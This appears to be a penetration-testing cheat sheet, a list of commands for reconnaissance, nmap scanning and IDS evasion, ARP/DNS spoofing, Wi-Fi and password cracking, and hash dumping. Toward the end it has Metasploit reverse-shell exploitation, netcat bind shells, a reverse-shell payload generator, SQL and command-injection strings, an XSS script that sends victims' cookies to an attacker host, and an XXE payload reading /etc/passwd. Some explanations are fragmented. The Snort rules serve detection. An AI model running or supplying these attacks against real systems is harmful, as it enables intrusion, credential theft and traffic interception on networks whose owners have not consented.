Ethical Hacking Cheat Sheet
Get name servers
dig @127.0.0.1 example.com ns
Get mail servers
dig @127.0.0.1 example.com mx
Get all records / zone transfer
dig @127.0.0.1 example.com axfr
AXFR is used to replicate DNS databases, so it will pull all records. It may not be allowed by the server, however.
dnsrecon -n example.com -r 18.104.22.168-22.214.171.124
-n specifies the name server, and
-r the range.
This relies on the DNS server storing reverse records.
DNS proxy / mitm
This is especially useful when we cannot force an application to use a proxy server of our choosing, such as applications that ignore OS HTTP proxy settings.
Without parameters, runs as a proxy, which allows us to intercept requests.
sudo dnschef --interface=<if> --fakeip=126.96.36.199 --fakedomains=example.com
This intercepts requests for
example.com and resolves them to
Debug it by running dig against it with the
@ option to specify the name server:
dig @10.0.0.123 example.com
This part of the course doesn’t look very passive to me, but it is taught in the passive intelligence section.
Find community strings
onesixtyone 10.0.0.123 -c /usr/share/doc/onesixtyone/dict.txt
snmpwalk -v 2c -c secret 10.0.0.123
Use the appropriate version (-v) and community string (-c).
Enumerate processes (OID)
snmpwalk -v 2c -c secret 10.0.0.123 188.8.131.52.184.108.40.206.2.1.2
Use other OIDs to enumerate different values of the system.
Enumerate processes (MIB)
snmpwalk -v 2c -c secret 10.0.0.123 hrSWRunName
sudo netdiscover -r 10.0.0.0/16
Passively discovers hosts on the network by listening for ARP and other types of packets.
Remember to use
-vv for increased verbosity on all scans.
Ping scan/sweep (no port scan)
nmap -sn 10.0.0.0/24
- Sends ICMP ping requests when run without root/sudo.
- May use ARP requests on a local network when run with root/sudo.
nmap -sL 10.0.0.0/24
Performs reverse DNS lookups, like
dnsrecon. Does not send any packets to the target hosts.
nmap -Pn 10.0.0.123
Use in combination with other scans.
Nmap typically pings the host to check whether it is alive before scanning it. Firewalls such as the Windows Firewall drops ICMP ping requests, however, making the host appear to be offline.
-Pn tells nmap to scan the host directly without pinging it first.
See Firewall/IDS Evasion and Spoofing for more Firewall/IDS evasion techniques.
nmap -f 10.0.0.123 nmap -mtu <size> 10.0.0.123
Makes scan packets less detectable by an IDS.
Use a bad checksum:
nmap -badsum 10.0.0.123
A host will drop packets with bad checksums. A firewall may reply to it nevertheless. This can be used to determine if there is a firewall/IDS present.
nmap -sT 10.0.0.123
- Issues a
connect()system call. Performs the full TCP handshake and closes the connection with a RST package.
- If the port is closed, the server responds to the
RST(a server would respond to anything but a
RST; RFC 793).
- If no
SYN/ACKis sent back from the server, nmap marks the port as
filtered. No response could be due to a firewall.
- Does not require root privileges.
- Easily detected since servers typically log connections.
- If no port is specified, tests common ports.
- Nmap does this scan by default when run without root/sudo permissions.
Half-open (“stealth”) scan
nmap -sS 10.0.0.123
- Sends a
SYNpacket but never completes the TCP-handshake with
ACK; instead, nmap responds to a running service’s
- A SYN-scan won’t be logged at the application level, since the connection is never completed.
- Trivially detectable by any modern IDS.
RST-> closed, no response -> filtered.
- Requires root/sudo (needs raw sockets).
- Nmap does this scan by default when run with root/sudo permissions.
nmap -sU 10.0.0.123
- For most ports, sends an empty packet. For some ports, sends a protocol-specific payload to increase response rate.
- If a service a listening, typically there is no response (empty packet request). nmap marks the port as
open|filtered. If there is a response, nmap marks the port as
- If a service is not listening, the server is expected to reply with an ICMP packet marking the port as unreachable. nmap marks the port as
- Much slower than TCP scans due to the no-response nature of open ports.
NULL, FIN, XMAS scans
nmap -sN 10.0.0.123 nmap -sF 10.0.0.123 nmap -sX 10.0.0.123
- Can evade some firewalls that are configured to look for certain TCP flags, e.g. dropping
SYNpackets to closed ports.
- Easily detectable by a modern IDS.
- Sends a TCP packet with no flags (NULL scan), the
FINflag (FIN scan), and
FIN(XMAS scan), respectively.
RSTexpected from closed ports.
- No response expected from open ports. nmap marks the port as
- Some network devices, e.g. Cisco, might respond with a
RSTregardless to make the port appear to be closed.
- If an ICMP unrechable response is sent, nmap marks the port as
Comma and range syntax
nmap -sT 10.0.0.123,124
nmap -sT 10.0.0.50-80
Use this to target multiple hosts.
Greppable output format
nmap 10.0.0.123 -oG out.txt
Get IP addresses from a ping scan
nmap -sn 10.0.0.0/24 -oG pingscan.txt cat pingscan.txt | cut -f2 -d" "
Read and scan IPs from a text file
nmap -iL pingscan.txt
Test port 80
nmap -p 80 10.0.0.123
Connect-scan port 80
nmap -sT -p 80 10.0.0.123
Scan all TCP ports
nmap -sT -p- 10.0.0.123
-p- for all ports.
UDP scan port 53
sudo nmap -sU -p53 10.0.0.123
TCP + UDP scan
sudo nmap -sT -sU 10.0.0.123
Will simultaneously test target ports using TCP and UDP.
sudo nmap -sO 10.0.0.123
Determines which IP protocols (TCP, ICMP, IGMP, etc) are supported by the target.
Service identification / version detection
nmap -sV 10.0.0.123
Performs service identification through banner grabbing. For HTTP, you can imagine this performing a HEAD request to identify the server and its version.
nmap -sV -p80 10.0.0.123
Run scripts on the
nmap -sC 10.0.0.123
Run all scripts in a category:
nmap --script malware 10.0.0.123
Run specific scripts:
nmap --script=snmp-sysdescr --script-args snmpcommunity=secret 10.0.0.123
Get help for a script:
nmap --script-help ftp-anon.nse
/usr/share/nmap/scripts/script.db - This includes script categories.
Script categories (full list):
default: A curated set of scripts that are fast, reliable, private, and mostly non-intrusive.
auth: Attempt to guess or bypass authentication.
brute: Brute-force authentication.
discovery: Perform more active network discovery, e.g. by querying SNMP servers.
exploit: Exploit vulnerabilities.
fuzzer: Fuzzes target services.
intrusive: Unsafe and likely to affect the target.
malware: Check whether the target is infected by malware or backdoors.
safe: Do not affect the target.
vuln: Scan for vulnerabilities.
See NSEDoc for a full list of scripts.
TLS cipher scan
nmap --script ssl-enum-ciphers -p 443 10.0.0.123
Returns cipher suites and compressors used by the server, graded A-F based on strength.
nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/vulnscript.sh 10.0.0.123
MySQL brute force
nmap -p 3306 --script mysql-brute 10.0.0.123
Understanding and debugging nmap
--packet-trace option to print a summary of packets sent and received by nmap. Applies to all types of scans, not just
-sn in this example.
nmap -sn 10.0.0.24/ --packet-trace
Used to craft custom packets. Can be used for all sorts of things.
Scan port 80
sudo hping3 -I interface -S 10.0.0.123 -p 80
Scan a range of ports
sudo hping3 -I interface -S 10.0.0.123 --scan 1-81
Spoof the source IP
sudo hping3 -I interface -S 10.0.0.123 -a 220.127.116.11 -p 80
If port 80 is open on the target, the target will reply to
Scanning on mobile
Install BusyBox to get GNU tool replicas on the phone.
busybox arping 10.0.0.123
busybox pscan 10.0.0.123
Nmap builds are available for mobile. Install nmap on the device. See command reference above.
Stealthy Network Recon
Nmap timing template
nmap -T <polite | sneaky | paranoid | ...>
Use this for different degrees of stealth / scanning speed.
Nmap scan delay
nmap --scan-delay 2s
Nmap waits at least this amount of time between each probe it sends to the target.
nmap -sS 10.0.0.123
SYN and waits for the response. If the response is
SYN/ACK, assumes the port is open; if it’s
RST, assumes it is closed. In the first case, Nmap will not send the final
ACK to complete the handshake.
This is actually the default scan option for nmap (needs root, otherwise falls back to a TCP connect() scan,
nmap -sF 10.0.0.123
If the port is closed, the target will respond with
RST. If the port is open, the target does not respond and instead ignores our
Windows is an exception to the above: it always responds with a
RST, so it will appear that ports are always closed. On the bright side, if we know a given port is open and we see this behaviour with
FIN scans, then we know the target is a Windows host.
Will trigger any decent IDS like snort, so not really decent in practice.
nmap -sX 10.0.0.123
Same response behaviour as in the case of
Will trigger any decent IDS.
nmap -sN 10.0.0.123
Same response behaviour as in the case of
Will trigger any decent IDS.
sudo nmap -sI zombie target
Scans ports on the target by spoofing packets that appear to come from a third host. The third host is probed for its IPID, which usually increments sequentially. The third host is required to be idle to make the IPID increments predictable.
sudo nmap -sS -p80 10.0.0.123 -D18.104.22.168,22.214.171.124,126.96.36.199,188.8.131.52
This will scan the target, but it will also spoof packets that appear to be coming from the given decoy IPs. It will look as if those IPs are also scanning the network.
RND options for the manual for more.
ME inserts your IP at a specific point in the list (its position is otherwise randomized).
RND generates a random, non-reserved IP address.
ICMP timestamp request
sudo nmap -sn -PE -PP 10.0.0.123 --send-ip
By default, Nmap uses ping / icmp requests for host discovery. Many hosts have ping turned off to appear to be unreachable, however, in an attempt to dodge scanners.
Instead, we can get Nmap to send ICMP timestamp requests (13), which a host might not be blocking.
-PE enables the feature,
-PP specifies an ICMP timestamp request.
--send-ip asks Nmap to send packets via raw IP sockets.
Subnet mask request
sudo nmap -sn -PE -PM 10.0.0.123 --send-ip
Similar comments as in the case above in terms of stealth and motivation.
sudo nmap -f -sS 10.0.0.123
A fragmentation scan (
-f) will send tiny fragmented IP packets to the target in an attempt to evade IDSs. This splits up TCP headers over several packets to make it harder for IDSs to detect the scan.
(The example above uses
-sS for a SYN scan, but you can combine
-f with other types of scans.)
Sniff port 80
sudo tshark -i interface -f "tcp port 80"
sudo tshark -i interface -f "icmp"
Finding and Exploiting Vulnerabilities
sudo lynis -c
Run all tests.
sudo lynis --pentest
For when you don’t have root privileges.
Quick and quiet
sudo lynis --pentest -q -Q
-Q) and quiet (
-q) scan which does not prompt for user input and reports only warnings.
Log and report
sudo cat /var/log/lynis-report.dat sudo cat /var/log/lynis.log
Check the report and logs for more details on the results of a scan.
Start database service
Start metasploit framework console
Import Nessus report
Search for vulnerability in the report
vulns -S shellshock
Replace shellshock with the vulnerability you are looking for.
Search for exploits for a vulnerability
In this example we use the vulnerability’s OSVDB ID.
Launching an exploit
use exploit/multi/http/apache_mod_cgi_bash_env_exec show options # Set exploit-specific parameters. set RHOST 10.0.0.123 set TARGETURI /cgi-bin/vulnscript.sh show payloads set PAYLOAD linux/x86/shell/reverse_tcp set LHOST 10.0.0.10 exploit
Generic Payload Handler
Provides the Metasploit payload system to exploits launched outside of the framework. Launches a listener that the exploit can connect to.
hydra -L users.txt -P passwords.txt -vV 10.0.0.123 ftp
For separate user and password files.
hydra -C accounts.txt 10.0.0.123 -vV ftp
For a file with lines formatted as
To experiment with sniffing and MITM, you can set up virtual networks on your machine using Mininet.
For ARP posioning, specifically, see mininet_tcp_hijacking.
Run command on host inside the Mininet prompt
h1 is the host; it could be
date is the command we are running in this particular example.
Run command on host
mininet/m h1 date
m tool provided by mininet.
For a MITM, enable forwarding to avoid breaking the target’s traffic:
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Write and display:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
Poison a specific target
sudo arpspoof -i eth0 -t 10.0.0.123 10.0.0.111
10.0.0.123 believe that we are
10.0.0.111. The latter could be the gateway, for example.
To sniff the traffic between two hosts, we must poison both.
Poison the entire subnet
sudo arpspoof -i eth0 10.0.0.111
Simply leave the target (
-t) option out to poison the entire subnet.
dsniff -i eth0
Perform a MITM using ARP poisoning first to sniff passwords from a target.
Ettercap automates ARP poisoning setups for MITM attacks and is also able to dissect packets for various application-layer protocols.
MITM all hosts on the subnet
ettercap -T -i eth0 -M arp:remote -L /tmp/mitm ///
-Tis for terminal mode, as opposed to GUI.
-Mspecifies the MITM mode.
-Lis to create log files.
///is where you specify the target IPs. Three slahes tells Ettercap to scan and poison all hosts on the subnet.
-L option makes Ettercap create two files:
.ecp- logged packets.
.eci- captured information from the session, like credentials.
driftnet -i eth0
Sniffs for images in the traffic.
dnsspoof -i eth0 -f hosts_file
dnsspoof forges replies to DNS address / pointer queries. Set up a MITM first with ARP poisoning.
Sits as a proxy between a web client and a web server.
Social Engineering Toolkit (SET)
Among many other things, SET can set up Website clones that deliver exploits to the visitor. These can be browser-specific, or it can be autopwn, which detects the browser and attempts the relevant exploits. The payload can be meterpreter. SET can also be used for credential stealing and other attacks.
run packetrecorder -li
run packetrecorder -i 1
Select the appropriate interface.
aircrack-ng to capture traffic first.
Inspect captured traffic
tshark -r capture.pcap
Crack a WEP key
Crack WPA2 key
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.pcap
This crack relies on a word list. The
rockyou.txt word list is directly available on Kali Linux.
Windows Lanman passwords
Windows stores LM hashes alongside NTLM hashes unless configured otherwise through a registry key. This is for backwards compatibility to authenticate with lder systems.
Dump hashes with pwdump2
pwdump2 > hashes.txt
pwdump2 to dump password hashes. This injects a DLL into
lsass.exe to read the
Dump hashes with meterpreter
Crack with John the Ripper
If you know the format:
john hashes.txt --format=nt2
Cracking MD5 hashes using a wordlist:
john hashes.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt
Crack with Cain & Abel
On Windows, you can also crack the passwords with Cain & Abel.
john also exists for Windows.
unshadow passwd shadow > passwords.txt
/etc/shadow files from the target, then unshadow them.
unshadow is part of the John the Ripper package. It combines both the shadow and passwd files so that John can use them.
passwords is the file resulting from the unshadow step above.
Crack passwords using a wordlist
john passwords.txt -w=wordlist.txt
john --show passwords.txt
passwords.txt is the same file that was given to John to crack.
Covert Channels and IDS Evasion
Run in IDS mode
snort -A console -i eth0 -c /etc/snort/snort.conf -l /var/log/snort -K pcap
-A is for alerts, which are displayed on the
Packet capture - text mode
snort -dev -i eth0 > capture.txt
Custom rules file
Alert on ICMP requests to any host on the network
alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001;)
alert- Rule action. Generate an alert when the set condition is met.
icmp- Protocol. ICMP, TCP, and UDP.
any- Source IP.
anymatches all source IPs.
any- Source port.
anymatches all source ports.
->- Direction. In this case, from source to destination.
$HOME_NET- Destination IP.
$HOME_NETis given by the snort.conf file.
any- Destination port.
anymatches all destination ports.
msg- Message included with the alert.
sid- Snort rule ID. IDs <=
Alert on FTP connections
alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002;)
Not that this rule does not actually care whether the connection succeeds / an FTP server is actually running. It simply reacts to the traffic.
Alert on message content
alert tcp any any -> $HOME_NET any (msg:"System file access"; content:"cat /etc/passwd"; sid:1000003;)
This will alert whenever the string
cat /etc/passwd is found in a request.
ncat --ssl -l -p 999 -e /bin/sh
Listens on 999 and drops a shell upon receiving a client connection. The channel is encrypted with SSL.
This transmits messages by hiding them in TCP/IP headers, transferring one byte at a time.
Start the listener
sudo covert_tcp -dest localhost -source localhost -source_port 10000 -dest_port 20000 -server -file /tmp/receive/file.txt
Send the message
sudo covert_tcp -dest localhost -source localhost -source_port 20000 -dest_port 10000 -file /tmp/send/file.txt
Using Trojans and Backdoors
nc -L -p 2000 -k -e cmd.exe
Gets netcat to listen (
-L) on port 2000 (
-p 2000) and bind a shell (
-e cmd.exe) upon receiving a connection.
-k makes netcat continue listening even after the client disconnects.
Buffer Overflow Exploits
Generate payloads with metasploit
Port bind in Perl
msfpayload windows/shell/bind_tcp LPORT=4444 P
This generates port bind shellcode in Perl (
P) format that listens on port 4444.
Reverse shell executable
msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=5555 X > payload.exe
Exploiting Common Web Application Vulnerabilities
' or 1=1#
' or 1=1;--
; echo hi
Test for XSS
Execute cookie grab
<script> var i = new Image(); i.src="http://10.0.0.10/grabcookie.php?cookie=" + document.cookie; </script>
grabcookie.php script would read the
cookie URL parameter and write it to a file.
More XSS Payloads
Test for XXE
<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]> <root>&read;</root>
Test for injection
Run OS command
Find programs that a user can run with sudo
sudo -l -U user_name